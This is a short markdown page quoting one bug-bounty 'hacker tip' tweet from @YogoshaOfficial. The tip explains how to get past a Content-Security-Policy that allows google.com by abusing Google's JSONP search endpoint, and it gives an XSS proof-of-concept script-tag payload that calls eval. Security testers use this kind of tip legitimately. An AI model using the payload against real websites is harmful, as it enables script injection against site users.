# Tips from @YogoshaOfficial

* [\[Hacker tips\] Are you afraid of CSP when you exploit an XSS ? No worries, sometimes the developer leaves something useful![👇](https://abs-0.twimg.com/emoji/v2/svg/1f447.svg) Exp CSP : Content-Security-Policy: script-src http://google.com XSS bypass payload : \<script src="https://google.com/complete/search?client=chrome\&jsonp=eval(alert(1…));">\</script>](https://twitter.com/YogoshaOfficial/status/1167106498859872257)